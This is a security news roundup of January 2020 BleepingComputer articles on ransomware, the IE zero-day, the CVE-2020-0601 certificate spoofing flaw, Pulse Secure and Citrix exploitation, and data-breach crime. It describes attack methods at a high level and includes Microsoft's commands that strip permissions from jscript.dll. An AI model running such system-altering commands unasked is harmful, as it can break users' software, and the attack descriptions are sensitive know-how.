Articles - List  Articles  Page 

Analysis  Android  Apple  APT  Attack  BigBrothers  BotNet  Congress  Crime  Crypto  Cryptocurrency  Cyber  CyberCrime  CyberSpy  CyberWar  Exploit  Forensics  Hacking  ICS  Incindent  iOS  IT  IoT  Mobil  OS  Phishing  Privacy  Ransomware  Safety  Security  Social  Spam  Vulnerebility  Virus

Source : Bleepingcomputer or Project Zero


New Jersey Synagogue Suffers Sodinokibi Ransomware Attack
20.1.2020 
Bleepingcomputer  Ransomware

Temple Har Shalom in Warren, New Jersey had their network breached by the actors behind the Sodinokibi Ransomware who encrypted numerous computers on the network.

In an email seen by BleepingComputer, Temple Har Shalom informed their congregation that they discovered the ransomware attack on January 9th after staff had trouble connecting to the Internet

After checking their servers, they found that the Temple's files were encrypted and a ransom note was left behind. Other computers on the network had been encrypted as well.

"The encryption affected all of our server-based files and electronic data. We have a mechanical back up for those files and data, but the back-up was encrypted as well. Certain computers were affected in full. Others were unaffected and remain functional," the email from Temple Har Shalom stated.

A source familiar with the matter told BleepingComputer that Sodinokibi was demanding close to $500,000 ransom to receive a decryptor for their network.

Temple Har Shalom states that they will be contacting congregation members for information needed to recreate encrypted files. This indicates that they have no intention of paying the ransom.

Like all ransomware victims, the temple feels violated by the attack but does not think they were targeted as a Jewish organization.

"The attack is violative of us as a community, though we have no reason to believe that we were targeted because we are a Jewish organization."

As Sodinokibi is known to steal files before encrypting them, they may have gained access to the personal data of congregants.

The synagogue states that this data may include a congregant's name, address, and email address, but they do not believe the attackers had access to their financial information.

"Beyond names, addresses and e-mail addresses of congregants, because of the way we segregate our files, we do not believe that confidential personal membership information (such as financial information) was accessed," the email stated. "Nonetheless, as we note above, be particularly mindful of phishing scams."

Temple members, though, should be on the lookout for targeted phishing emails using their personal information.

Sodinokibi has also started to publicly leak the stolen data of victims if a ransom is not paid. It is not known how much data, if any, was stolen from the temple or if they intend to publish it for non-payment.

BleepingComputer has contacted both the ransomware actors and the temple, but have not heard back at this time.


Microsoft Issues Mitigation for Actively Exploited IE Zero-Day
20.1.2020 
Bleepingcomputer  Exploit

Microsoft published a security advisory containing mitigation measures for an actively exploited zero-day remote code execution (RCE) vulnerability impacting Internet Explorer.

Redmond's advisory says that the company is aware of "limited targeted attacks" targeting this vulnerability.

"A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Internet Explorer," says the advisory.

"The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user."

While no patch exists for this issue so far, Microsoft says that they are currently working on a fix that could be released as an out-of-band security update, as it happened in September 2019 when a very similar Internet Explorer RCE zero-day was fixed.

Security Response

@msftsecresponse
Security Advisory - Microsoft Guidance on Scripting Engine Memory Corruption - for more information please visit: https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/ADV200001 …

43
11:16 PM - Jan 17, 2020
Twitter Ads info and privacy
47 people are talking about this
Attackers who successfully exploit this security flaw can gain the same user permissions as the user logged into the compromised Windows device.

If the user is logged on with administrative permissions, the attacker can take full control of the system allowing program installation, data manipulation, or the possibility to create accounts with full user rights.

"In a web-based attack scenario, an attacker could host a specially crafted website that is designed to exploit the vulnerability through Internet Explorer and then convince a user to view the website, for example, by sending an email," Microsoft adds.

The list of Internet Explorer versions and platforms impacted by this zero-day flaw, including the impact and severity ratings, are available below.

Product Platform Impact Severity
Internet Explorer 10 Windows Server 2012 Remote Code Execution Moderate
Internet Explorer 11 Windows 10 Version 1803 for 32-bit Systems Remote Code Execution Critical
Internet Explorer 11 Windows 10 Version 1803 for x64-based Systems Remote Code Execution Critical
Internet Explorer 11 Windows 10 Version 1803 for ARM64-based Systems Remote Code Execution Critical
Internet Explorer 11 Windows 10 Version 1809 for 32-bit Systems Remote Code Execution Critical
Internet Explorer 11 Windows 10 Version 1809 for x64-based Systems Remote Code Execution Critical
Internet Explorer 11 Windows 10 Version 1809 for ARM64-based Systems Remote Code Execution Critical
Internet Explorer 11 Windows Server 2019 Remote Code Execution Moderate
Internet Explorer 11 Windows 10 Version 1909 for 32-bit Systems Remote Code Execution Critical
Internet Explorer 11 Windows 10 Version 1909 for x64-based Systems Remote Code Execution Critical
Internet Explorer 11 Windows 10 Version 1909 for ARM64-based Systems Remote Code Execution Critical
Internet Explorer 11 Windows 10 Version 1709 for 32-bit Systems Remote Code Execution Critical
Internet Explorer 11 Windows 10 Version 1709 for x64-based Systems Remote Code Execution Critical
Internet Explorer 11 Windows 10 Version 1709 for ARM64-based Systems Remote Code Execution Critical
Internet Explorer 11 Windows 10 Version 1903 for 32-bit Systems Remote Code Execution Critical
Internet Explorer 11 Windows 10 Version 1903 for x64-based Systems Remote Code Execution Critical
Internet Explorer 11 Windows 10 Version 1903 for ARM64-based Systems Remote Code Execution Critical
Internet Explorer 11 Windows 10 for 32-bit Systems Remote Code Execution Critical
Internet Explorer 11 Windows 10 for x64-based Systems Remote Code Execution Critical
Internet Explorer 11 Windows 10 Version 1607 for 32-bit Systems Remote Code Execution Critical
Internet Explorer 11 Windows 10 Version 1607 for x64-based Systems Remote Code Execution Critical
Internet Explorer 11 Windows Server 2016 Remote Code Execution Moderate
Internet Explorer 11 Windows 7 for 32-bit Systems Service Pack 1 Remote Code Execution Critical
Internet Explorer 11 Windows 7 for x64-based Systems Service Pack 1 Remote Code Execution Critical
Internet Explorer 11 Windows 8.1 for 32-bit systems Remote Code Execution Critical
Internet Explorer 11 Windows 8.1 for x64-based systems Remote Code Execution Critical
Internet Explorer 11 Windows RT 8.1 Remote Code Execution Critical
Internet Explorer 11 Windows Server 2008 R2 for x64-based Systems Service Pack 1 Remote Code Execution Moderate
Internet Explorer 11 Windows Server 2012 Remote Code Execution Moderate
Internet Explorer 11 Windows Server 2012 R2 Remote Code Execution Moderate
Internet Explorer 9 Windows Server 2008 for 32-bit Systems Service Pack 2 Remote Code Execution Moderate
Internet Explorer 9 Windows Server 2008 for x64-based Systems Service Pack 2 Remote Code Execution Moderate
Redmond provides the following workaround to mitigate this vulnerability:

For 32-bit systems, enter the following command at an administrative command prompt:

takeown /f %windir%\system32\jscript.dll
cacls %windir%\system32\jscript.dll /E /P everyone:N
For 64-bit systems, enter the following command at an administrative command prompt:

takeown /f %windir%\syswow64\jscript.dll
cacls %windir%\syswow64\jscript.dll /E /P everyone:N
takeown /f %windir%\system32\jscript.dll
cacls %windir%\system32\jscript.dll /E /P everyone:N
Undoing the workaround

For 32-bit systems, enter the following command at an administrative command prompt:

cacls %windir%\system32\jscript.dll /E /R everyone
For 64-bit systems, enter the following command at an administrative command prompt:

cacls %windir%\system32\jscript.dll /E /R everyone
cacls %windir%\syswow64\jscript.dll /E /R everyone


New US Bill Wants to Assign State Cybersecurity Coordinators
20.1.2020 
Bleepingcomputer  Cyber

Four U.S. Senators have introduced a bipartisan bill that will require the Department of Homeland Security (DHS) to appoint cybersecurity effort coordinators in every state to orchestrate cyberattack response and remediation efforts, and to improve coordination between federal, state, and local entities.

Cybersecurity state coordinators will have to ensure that local, state, and federal entities collaborate and share resources during cybersecurity threat prevention and response processes according to the Cybersecurity State Coordinator Act of 2020 bill introduced by Senators Margaret Hassan (D-NH), John Cornyn (R-TX), Rob Portman (R-OH), and Gary Peters (D-MI) on January 16, 2020.

"Cyberattacks can be devastating for communities across our country, from ransomware attacks that can block access to school or medical records to cyberattacks that can shut down electrical grids or banking services," the bill's sponsor Senator Hassan said.

"The bipartisan bill I introduced would take a big step forward in improving communication between the federal government, states, and localities, as well as strengthening cybersecurity preparedness in communities across the country."

Senator Hassan also stated that, while officials were well prepared to respond to ransomware attacks such as the ones hitting New Hampshire’s Strafford County and the Sunapee School District, the federal government has to make sure that local and state entities have all the training and resources to mitigate and defend against future attacks.

Cybersecurity state coordinator responsibilities
Hassan's press release explains that the federally funded Cybersecurity State Coordinator program will be housed in DHS's Cybersecurity and Infrastructure Security Agency (CISA).

A CISA employee would be appointed by the Director to act as Cybersecurity State Coordinators according to the just introduced bill's text, to have several duties including to:

• Improve coordination within federal entities and between federal and non-federal entities, including state and local governments and other organizations
• Support preparation, response, and remediation efforts relating to cybersecurity risks and incidents, including ransomware
• Facilitate the sharing of cyber threat information
• Raise awareness of financial, technical, and operational resources that the federal government offers to non-federal entities to help prevent cyber threats

Senator Portman added that "cybersecurity for state and local governments is just as important as federal cybersecurity, and frequently, they lack the resources, technical know-how, and situational awareness to secure their systems, or respond in the event of an attack.

This bipartisan bill, which creates a Cybersecurity State Coordinator position, would help bolster state and local governments’ cybersecurity by facilitating their relationship with the federal government to ensure they know what preventative resources are available to them as well as who to turn to if an attack occurs."

Senator Peters also stated that U.S. states need someone to take control in case of cyberattacks to coordinate efforts with federal government experts given the increasing sophistication of current cyber threats.

"These coordinators would help states better understand relevant threats, access federal cybersecurity resources and respond to potential attacks," he added.

DHS cyber response teams to ransomware, cyberattacks
Senator Hassan introduced another bill on January 31, 2019, known as the DHS Cyber Hunt and Incident Response Teams Act, to authorize DHS cyber hunt and incident response teams following the increasing number of cyberattacks targeting US entities during 2018.

The bill enacted and signed by the President on December 20, 2019, allows the newly established teams to provide technical support and advice to government and private sector organizations on how to properly reinforce their IT systems against such attacks.

Per the DHS Cyber Hunt and Incident Response Teams Act, the DHS makes these teams responsible for:

• assistance to asset owners and operators in restoring services following a cyber incident;
• identification of cybersecurity risk and unauthorized cyber activity;
• mitigation strategies to prevent, deter, and protect against cybersecurity risks;
• recommendations to asset owners and operators for improving overall network and control systems security to lower cybersecurity risks, and other recommendations, as appropriate;

The Senator previously worked on other bipartisan bills focused on cybersecurity, including the Hack Department of Homeland Security (DHS) Act and the Public-Private Cybersecurity Cooperation Act as part of a package of bills signed into law on December 21, 2018.

The FBI's Internet Crime Complaint Center issued a public service announcement in October 2019 on the growing number of high-impact ransomware attacks against both public and private US organizations.


How Malware Gains Trust by Abusing the Windows CryptoAPI Flaw
20.1.2020 
Bleepingcomputer  Vulnerebility  Virus

The new Windows CryptoAPI CVE-2020-0601 vulnerability disclosed by the NSA can be abused by malware developers to sign their executables so that they appear to be from legitimate companies. This creates trust in the program, which may cause a user to be more willing to execute them.

Most of the coverage of this vulnerability illustrates how the vulnerability can be exploited to spoof certificates used for TLS connections to web sites and perform MiTM attacks.

For example, Kudelski Security illustrated how they used the vulnerability to create a fake certificate that impersonates github.com. To protect users, Chrome added protections that block users from accessing sites using these spoofed certificates.

Spoofing web site certificates
Spoofing web site certificates
This vulnerability, though, can also be used to spoof code-signing certificates.

When a developer releases a program, they can digitally sign the executables to assure users that the program is from a trusted source. If that user trusts the company, then their signed executables are most likely trustworthy as well and would be more apt to execute them.

Antivirus software may also whitelist software from being detected as malware if they utilize trusted and well-known digital signatures.

Using this new CryptoAPI vulnerability, malware distributors can create code-signing certificates that spoof legitimate companies so that their signed malware executables appear to be from a trusted company like Microsoft.

It's about trust
When running an executable in Windows that requires elevated, or administrative, privileges the operating system will display a User Account Control (UAC) prompt asking you to confirm if the permission should be granted.

If the executable has been code-signed, the UAC prompt will display a blue banner, the product name of the executable, its icon, and the name of the developer listed in the code-signing certificate. The user can then use this information to decide if they should grant elevated privileges to the program.

UAC Prompt for the Windows Registry Editor
UAC Prompt for the Windows Registry Editor
When this same executable is unsigned, Windows will display a UAC prompt with a yellow banner that specifies the publisher is 'Unknown' and once again asking if you would like to give elevated privileges.

UAC Prompt from an unsigned executable
UAC Prompt from an unsigned executable
As you can see from the two prompts above, the one for the unsigned executable is intended to make the user more wary about providing administrative privileges.

Due to this, malware distributors are commonly creating fake companies to purchase code-signing certificates or stealing certificates from other companies. These certificates are then used to sign their malware executables.

The problem for attackers, though, is that once a certificate is reported to be used with malware, the certificate authority responsible for this cert will revoke it so that it no longer works.

Using CVE-2020-0601 to spoof trusted publishers
Using the CVE-2020-0601 vulnerability, malware distributors can easily create certificates that spoof legitimate companies such as Microsoft.

This allows them to sign their executables so that they appear as the same code signing certificate as seen in Windows executables. Even worse, as these certificates are exploiting a vulnerability, they cannot be revoked by certificate authorities or blocked on unpatched Windows devices.

By signing an executable as a trusted publisher, it could also allow malware to bypass antivirus engines that have whitelisted the trusted certificate.

To illustrate this, BleepingComputer found an executable on VirusTotal that is signed with a certificate exploiting the CVE-2020-0601 vulnerability. This certificate spoofs the ones used by Microsoft to sign Windows executables.

On an unpatched system, Windows does not see anything wrong with the certificate when it is opened.

Certificates on an unpatched system
Certificates on an unpatched system
Even when you run the program, it displays a UAC prompt indicating it was signed by Microsoft.

UAC prompt on an unpatched system
UAC prompt on an unpatched system
On a patched system, though, Windows will see that this certificate is spoofed and display a warning stating "A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider."

Certificates on a patched system
Certificates on a patched system
UAC prompts on a patched system will also ignore the spoofed certificate and treat the application as untrusted.

UAC prompt on a patched system
UAC prompt on a patched system
It is not a question as to whether malware will exploit this vulnerability, but a question as to when.

Already on VirusTotal, we see researchers uploading executables [1, 2, 3] signed with spoofed certificates and can expect to see malware using it in the wild soon.

With easy to use proof-of-concepts available, this vulnerability allows attackers to generate signed malware that looks trusted and possibly bypass antivirus software.

Even better, it allows them to do so without the cost or hardship of acquiring a legitimate code-signing certificate that can easily be revoked.

"This is an immediate high-impact scenario for malware bypass. For the past year, malware deliveries have reused a signed malware to bypass AV systems relying on this check rather than their own. At its best, the criminals would leverage this vulnerability against unpatched Windows 10 as part of "free" malware signing bypassing static and/or trust-based detection," Head of SentinelLabs Vitali Kremez told BleepingComputer in a conversation about this vulnerability.

Windows Defender detects malicious certificates
The good news is that antivirus software, web browsers, and Microsoft have been hard at work implementing detections for these spoofed certificates.

Windows Defender will now detect programs signed with certificates that exploit this vulnerability as Exploit:Win32/CVE-2020-0601.

Windows Defender detected CVE-2020-0601
Windows Defender detected CVE-2020-0601
Microsoft is also utilizing the CveEventWrite function to log attempts to exploit the CVE-2020-0601 vulnerability to the Event Viewer.

Logging exploit attempts to Event Viewer
Logging exploit attempts to Event Viewer
Google Chrome added new protections in Chrome 79.0.3945.130 that prevent you from accessing sites using spoofed certificates.

Chrome with CVE-2020-0601 detection
Chrome with CVE-2020-0601 detection
Finally, antivirus engines such as ones from McAfee, Kaspersky, ZoneAlarm, and GData have added detections for this vulnerability and others will do the same.

If so many security companies and software developers are taking this vulnerability seriously, so should you.

Be sure to install the patch as soon as possible to become protected.


FBI Says State Actors Hacked US Govt Network With Pulse VPN Flaw
20.1.2020 
Bleepingcomputer  BigBrothers

FBI said in a flash security alert that nation-state actors have breached the networks of a US municipal government and a US financial entity by exploiting a critical vulnerability affecting Pulse Secure VPN servers.

The US Cybersecurity and Infrastructure Security Agency (CISA) previously alerted organizations on January 10 to patch their Pulse Secure VPN servers against ongoing attacks trying to exploit the flaw tracked as CVE-2019-11510.

This bug enables unauthenticated remote attackers to send a specially crafted URIs to connect to vulnerable servers and read sensitive files containing user credentials. These can later be used to take control of an organizations' systems and more.

On unpatched systems, the vulnerability "allows people without valid usernames and passwords to remotely connect to the corporate network the device is supposed to protect, turn off multi-factor authentication controls, remotely view logs and cached passwords in plain text (including Active Directory account passwords)," security researcher Kevin Beaumont explained.

FBI Flash Alert AC-000112-TT

US entities breached in Pulse Secure VPN attacks
The FBI says that unidentified threat actors have used the CVE-2019-11510 flaw "to exploit notable US entities" since August 2019.

In August 2019, attackers were able to gain access to a US financial entity’s research network by exploiting servers unpatched against CVE-2019-11510.

During the same month, a US municipal government network was also breached following an attack that exploited the same vulnerability.

Based on the sophistication of the Tactics, Techniques, and Procedures (TTPs) used in the two attacks, "the FBI believes unidentified nation-state actors are involved in both compromises; however, it remains unclear if these are isolated incidents."

US govt network hacked
The attack that targeted and compromised the US municipal government network took place in mid-August 2019 according to the FBI.

"In this case, the operators were able to enumerate and exfiltrate user accounts, host configuration information, and session identifiers that could allow them to gain further access to the internal network.

At this time, the FBI is continuing to gather indicators of compromise on the incident."

Attackers infiltrate US financial entity's research network
"The intruder(s) remotely exploited a Pulse Secure VPN appliance by using CVE-2019-11510," the flash alert says. "The vulnerability in Pulse Secure allowed directory transversal and access to a file where login credentials were written in plain text. In addition, the Pulse Secure appliance may have been vulnerable to a buffer overflow and command injection.

After breaching the network, the nation-state actors gained access to the Active Directory, harvesting and exfiltrating user credentials (usernames and passwords) for the VPN client

Following attempts to enumerate and gaining access to other network segments, the hackers were only able to infiltrate the exploited segment which was the only one on the network using single-factor authentication.

"The intruder(s) attempted to access several Outlook web mail accounts but were unsuccessful due to the accounts being on separate domains
requiring different credentials not obtained by the intruder(s).

While the intruder(s) performed additional enumeration, there was no evidence that any data was compromised or exfiltrated, and the intruder(s) seemingly did not install any persistence capability or foothold in the network."

FBI PIN 20200109-001

Possible Iran connection and mitigation measures
While the FBI did not directly connect these attacks to Iranian-backed hackers, a Private Industry Notification (PIN) detailing Iranian Cyber Tactics and Techniques shared a day later mentions "information indicating Iranian cyber actors have attempted to exploit Common Vulnerability and Exposures (CVEs) 2019-11510 [..]"

"The FBI assesses this targeting, which has occurred since late 2019, is broadly scoped and has affected numerous sectors in the United States and other countries.

The FBI has observed actors using information acquired from exploiting these vulnerabilities to further access targeted networks, and establish other footholds even after the victim patched the vulnerability."

Municipalities are advised by the FBI to review this National Security Agency (NSA) cybersecurity advisory on mitigating VPN vulnerabilities.

They're also recommended to take the following measures to defend against the impact of potential attacks targeting domains connected to municipality networks, including "local infrastructure managing emergency services, transportation, or elections:"

• Be alert to and immediately install patches released by the vendors, especially for web-facing appliances;
• Block or monitor the malicious IP addresses above, as well as any other IP addresses conducting remote logins at odd hours;
• Reset credentials before reconnecting the upgraded devices to an external network;
• Revoke and create new VPN server keys and certificates;
• Use multifactor authentication as a measure of security beyond passwords, which allows you to differentiate a user from an attacker;
• Review your accounts to ensure adversaries did not create new accounts;
• Implement network segmentation where appropriate;
• Ensure that administrative web interfaces are not accessible from the internet.

Ongoing attacks targeting unpatched Pulse Secure VPN servers
According to an NSA advisory from October 2019, "Exploit code is freely available online via the Metasploit framework, as well as GitHub. Malicious cyber actors are actively using this exploit code."

While on August 25, 2019, security firm Bad Packets discovered 14,528 unpatched Pulse Secure servers, a scan from today yielded 3,328 results with the U.S. being the first on the "leaderboard" with over 1,000 unpatched VPN servers.

Bad Packets Report
@bad_packets
Week 21 CVE-2019-11510 Scan Results
• Vulnerable Pulse Secure VPN servers detected: 3,328

Our latest vulnerability scan results are freely available for authorized government CERT, CSIRT, and ISAC teams.

Submit request here: https://forms.gle/nkVd1xNkACobo2Zt6 …#cybersecurity #threatintel

9
9:41 AM - Jan 17, 2020
Twitter Ads info and privacy
See Bad Packets Report's other Tweets
The two US entities the FBI says were compromised are not the only examples of such successful attacks targeting CVE-2019-11510.

While not yet officially confirmed, a high-profile case could be that of the international foreign currency exchange Travelex which was hit by Sodinokibi ransomware on December 3 after not patching their Pulse Secure VNP servers, with the attackers asking for a $3 million ransom.

Travelex was one of the companies Mursch warned of having vulnerable servers in September 2019. Travelex did not reply to his email at the time.

Scott Gordon (CISSP), Pulse Secure Chief Marketing Officer, told BleepingComputer that attackers are actively exploiting "unpatched VPN servers to propagate malware, REvil (Sodinokibi), by distributing and activating the Ransomware through interactive prompts of the VPN interface to the users attempting to access resources through unpatched, vulnerable Pulse VPN servers."


Hackers Are Securing Citrix Servers, Backdoor Them for Access
20.1.2020 
Bleepingcomputer  Hacking  Vulnerebility

An unknown threat actor is currently scanning for and securing vulnerable Citrix ADC servers against CVE-2019-19781 exploitation attempts, while also backdooring them for future access.

The actor deploys a payload dubbed NOTROBIN by FireEye researchers who discovered this campaign, an implant designed to clean the Citrix ADC appliances of malware strains known to target such devices and to mitigate the CVE-2019-19781 flaw to block subsequent exploitation efforts.

NOTROBIN also plants a backdoor that provides access to the now secured Citrix ADC server to actors that know a secret hardcoded passphrase, unique for each compromised device.

The NOTROBIN payload was also observed while adding cron syslog entries to gain persistence on compromised servers.

Further exploitation blocked on 'secured' devices
"FireEye believes that this actor may be quietly collecting access to NetScaler devices for a subsequent campaign," the report adds.

While monitoring one of the devices where NOTROBIN was dropped, the researchers were able to observe more than a dozen attacks being blocked over three days, with the attackers being served with 404 errors after their malicious templates containing commands were deleted in real-time.

"The mitigation works by deleting staged exploit code found within NetScaler templates before it can be invoked," FireEye explains.

"However, when the actor provides the hardcoded key during subsequent exploitation, NOTROBIN does not remove the payload. This lets the actor regain access to the vulnerable device at a later time."

While this actor hasn't yet dropped any other malware on the Citrix servers it secured against future CVE-2019-19781 exploitation, FireEye's researchers are skeptical about his future goals seeing that, on the whole, this entire campaign looks like a staging operation hoarding Citrix appliances for yet unknown purposes.

Citrix still working on a patch for vulnerable appliances
The CVE-2019-19781 vulnerability affects Citrix Application Delivery Controller (ADC), Citrix Gateway, and Citrix SD-WAN WANOP appliances, and it enables unauthenticated attackers to perform arbitrary code execution via directory traversal after exploitation.

Currently, over 25,000 Citrix endpoints are vulnerable to attacks targeting this flaw, with almost 1,000 found in the U.S. and thousands more in Germany, United Kingdom, Switzerland, and Australia as Bad Packets reported almost a week ago.

Scans for vulnerable Citrix appliances began on January 8 according to security experts, and proof-of-concept (PoC) exploits were made public two days later.

The PoC exploits allow attackers to take control of vulnerable Citrix Application Delivery Controller (NetScaler ADC) and Citrix Gateway (NetScaler Gateway) devices by creating reverse shells and executing malicious commands on the compromised servers.

Although Citrix disclosed the bug almost a month ago, a patch available for the Citrix ADC CVE-2019-19781 flaw is not yet available. Instead, the company provides mitigations and has shared a timeline of expected release dates for firmware updates to address the issue, starting with January 20th, 2020.

Fermin J. Serna
@fjserna
We just published further information around the Citrix ADC/Gateway vulnerability with fix release dates. If I can recommend something, apply the mitigation ASAP if you have the management IP exposed and not firewall protected. It stops the attack on known vulnerable scenarios. https://twitter.com/CitrixNetwork/status/1216153467926073349 …

Citrix Networking
@CitrixNetwork
Blog post from @Citrix CISO @fjserna about updates to the Citrix ADC, Citrix Gateway #CVE201919781 vulnerability - https://bit.ly/36LRITI

122
1:43 AM - Jan 12, 2020
Twitter Ads info and privacy
90 people are talking about this
Citrix also noted in an updated advisory yesterday, the mitigations are ineffective for Citrix ADC Release 12.1 builds before 51.16/51.19 and 50.31 because a "bug exists that affects responder and rewrite policies bound to VPN virtual servers causing them not to process the packets that matched policy rules."

For these cases, the company recommends updating to an unaffected build and then applying the mitigation steps to fully protect devices.

Four days ago, the Cybersecurity and Infrastructure Security Agency (CISA) also released a public domain tool that allows security staff to test if their organizations' servers are vulnerable.

The Dutch National Cybersecurity Centre (NCSC) issued a warning yesterday advising companies to shut down their Citrix ADC and Gateway servers until a reliable solution for protecting all Citrix appliance versions against CVE-2019-19781 will be available.

The full timeline of expected release dates for firmware updates is available below:

Citrix ADC and Citrix Gateway
Version Refresh Build Expected Release Date
10.5 10.5.70.x 31st January 2020
11.1 11.1.63.x 20th January 2020
12.0 12.0.63.x 20th January 2020
12.1 12.1.55.x 27th January 2020
13.0 13.0.47.x 27th January 2020
Citrix SD-WAN WANOP
Release NetScaler Release Expected Release Date
10.2.6 11.1.63.x 27th January 2020
11.0.3 11.1.63.x 27th January 2020


Fraudsters Set Up Site Selling Temporary Social Security Numbers
20.1.2020 
Bleepingcomputer  CyberCrime

Some fraudsters have set up a scam site claiming to be for a data protection fund created by the U.S. Federal Trading Commission (FTC) to offer financial compensation to users whose personal data appeared in information leaks.

This is a reinterpretation of the classic advance-fee scam where the victim makes a small payment inebriated by the promise of getting a much larger sum in return.

Despite posing as a site associated with the FTC, this money-making scheme accepts victims from any country and offers to sell "temporary social security numbers (SSNs)" to those that don't have one.

Bait: cash for data leak victims
Named "Official Personal Data Protection Fund," the website promises to pay users of any geography if their personal data was used by an unauthorized third party.

A fake verification service can help users find out if their data ever leaked. The results of the check dictate if the user is entitled to compensation and the exact value.

This "verification" requires some personal data, though. At least the name (first and last) and phone number are required for the check to begin.

There are three specific sources to choose from - social networks, messengers, and ad networks, and details for the selected one are also needed.

The form accepts any information, Kaspersky's Tatyana Sidorina writes in a blog post on Thursday.


Regardless of what you enter in the form, results are returned and, as expected, they claim that personal data was found in leaks and that financial compensation was available.

While analyzing the fraudulent website, Kaspersky typed "fghfgh fghfgh" for the name of the user. The results returned showed that photos, videos, and contact information "repeatedly appeared in information leaks."


The compensation calculated by the fraudsters was $2,567, a sum sufficiently large to keep victims interested in how they can get it: provide a card number and the SSN.

The fact that this program is associated with the FTC and users of any geography are eligible should ring the alarm in the first place. Spelling mistakes are also a good clue that this is a scam and should keep you from sending personal information.

Since users of any geography are accepted, not all have an SSN. The solution is to buy a temporary SSN valid for two days, for the low price of $9.32.


Even if a real SSN is provided, the website will still ask you to get a temporary one. Sidorina notes that the payment page is localized, at least for Russian IP addresses, and the price is converted to rubles.

"This is strange. Why would a U.S. government agency require payment in a foreign currency?"

Kaspersky believes that Russian speakers are behind this, as the similarity with other schemes running in Russia and the Commonwealth of Independent States (CIS) and the ruble payment form seems to suggest so.


WeLeakInfo.com Seized For Selling Info from Data Breaches, 2 Arrested
20.1.2020 
Bleepingcomputer  Incindent

As a clear indication of how law enforcement views the commercial disclosure of stolen information, the FBI has seized the WeLeakInfo.com domain and international law enforcement arrested two individuals for selling subscriptions to data exposed in breaches. These accessed credentials were then used to conduct attacks in the UK, Germany, and the US.

In coordination with the UK NCA, the Netherlands National Police Corps, the German Bundeskriminalamt, and the Police Service of Northern Ireland. the FBI took ownership of the WeLeakInfo.com domain name and added a notice stating it was seized.

WeLeakInfo.com Seizure Notice
WeLeakInfo.com Seizure Notice
According to a U.S. Department of Justice announcement, the domain was seized for offering subscriptions that allowed subscribers to search for specific information exposed in data breaches.

"The website had claimed to provide its users a search engine to review and obtain the personal information illegally obtained in over 10,000 data breaches containing over 12 billion indexed records – including, for example, names, email addresses, usernames, phone numbers, and passwords for online accounts. The website sold subscriptions so that any user could access the results of these data breaches, with subscriptions providing unlimited searches and access during the subscription period (one day, one week, one month, or three months)."

As part of this operation, two individuals were arrested in the Netherlands and Ireland who are suspected to be involved in the site and are believed to have made £200,000 from its operation. Online payments traced back to these individual's IP addresses indicate that they may be heavily involved in the site's operation.

The UK's NCA states that they have established links between We Leak Info and the purchase of further malware such as RATs and Cryptors.

"Law enforcement activity in the UK last year established links between the purchase of cyber crime tools, such as remote access Trojans (RATs) and cryptors, and weleakinfo.com."

The commercialization of stolen data
We Leak Info claimed to have compiled almost 12.5 billion records stolen from data breaches and allowed users to pay to access it.

To access this data, visitors could subscribe to various plans ranging from a $2 trial to a $70 three-month unlimited access account. These plans would then allow a user to perform searches that retrieve information exposed in these data breaches.

WeLeakInfo Plans
WeLeakInfo Plans
The actual disclosure of the stolen data compared to just allowing users to be notified if their info was exposed is a clear distinction between how We Leak Info and a service like HaveIBeenPwned utilize data breaches.

In We Leak Info's case, threat actors commonly subscribed to search for exposed usernames and passwords and then used that info to perform credential stuffing attacks, phishing attacks, and potentially network breaches.

On the other hand, HaveIBeenPwned will just tell you if an entered email is part of a data breach, but does not provide any other information.

Seizure notice thought to be a joke, even by owners
When the news that weleakinfo.com was seized, people were not sure if this was a prank being conducted by the owners or an actual seizure by law enforcement.

To illustrate this confusion, a poll on Twitter showed that 70% of the 492 respondents felt that this was a joke.

Voting on whether it was a prank
Voting on whether it was a prank
At the time, even We Leak Info indicated that they had no idea what was going on and tweeted that they "are currently investigating this issue."

Tweet from We Leak Info
Tweet from We Leak Info
With the press releases from law enforcement, we now have a clear picture that this was not a joke and that their operation has been shut down.

Update 1/17/20: Included information revealed in today's press release from the UK NCA.


Dutch Govt Suggests Turning Off Citrix ADC Devices, Mitigations May Fail
20.1.2020 
Bleepingcomputer  BigBrothers  Vulnerebility

Mitigation recommendations for CVE-2019-19781, a currently unpatched critical flaw affecting Citrix Application Delivery Controller (ADC) and Citrix Gateway, do not have the expected effect on all product versions.

In an updated advisory today, the software company informs that it found a new product that is vulnerable to the same security issue and that the advised actions do not work on some versions of Citrix ADC.

Bug makes mitigation ineffective on some Citrix ADC
Until patches become available, the company sticks to the original advice but notes that it is ineffective for Citrix ADC Release 12.1 builds before 51.16/51.19 and 50.31 because “bug exists that affects responder and rewrite policies bound to VPN virtual servers causing them not to process the packets that matched policy rules.”

The recommended course in this case is to first update to an unaffected build and then apply the mitigation steps.

Further analysis of the vulnerability and its impact on Citrix products revealed that it is also present in the Wan Optimization (WANOP) edition of the Citrix SD-WAN appliance.

The updated list of Citrix products affected by CVE-2019-19781 now looks like this:

Citrix ADC and Citrix Gateway version 13.0 all supported builds
Citrix ADC and NetScaler Gateway version 12.1 all supported builds
Citrix ADC and NetScaler Gateway version 12.0 all supported builds
Citrix ADC and NetScaler Gateway version 11.1 all supported builds
Citrix NetScaler ADC and NetScaler Gateway version 10.5 all supported builds
Citrix SD-WAN WANOP software and appliance models 4000, 4100, 5000, and 5100 all supported builds
Turn off Citrix appliance, if possible
In a warning today, the Dutch National Cybersecurity Centre (NCSC) says that companies should consider turning off Citrix ADC and Gateway servers if the impact is acceptable. Given the latest update, the organization assesses that at the moment there is no reliable solution to protect all versions of Citrix ADC and Citrix Gateway servers against CVE-2019-19781.

If turning off the appliances is not possible, NCSC strongly recommends monitoring the network for potential abuse. Further limiting the risk of exploitation is possible by whitelisting specific IP addresses or IP blocks.

Threat actors are currently exploiting the bug, both Citrix and the Dutch National Cybersecurity Center (NCSC) warn. Scanning for vulnerable Citrix ADC and Gateway appliances started in the first week of the year and multiple working exploits are available in the public space.

Firmware updates that fix the problem in all supported builds of Citrix ADC, Citrix Gateway, and SD-WAN WANOP are expected to be released by the end of January. Below is a timeline of the expected release dates:

Citrix ADC and Citrix Gateway
Version Refresh Build Expected Release Date
10.5 10.5.70.x 31st January 2020
11.1 11.1.63.x 20th January 2020
12.0 12.0.63.x 20th January 2020
12.1 12.1.55.x 27th January 2020
13.0 13.0.47.x 27th January 2020
Citrix SD-WAN WANOP
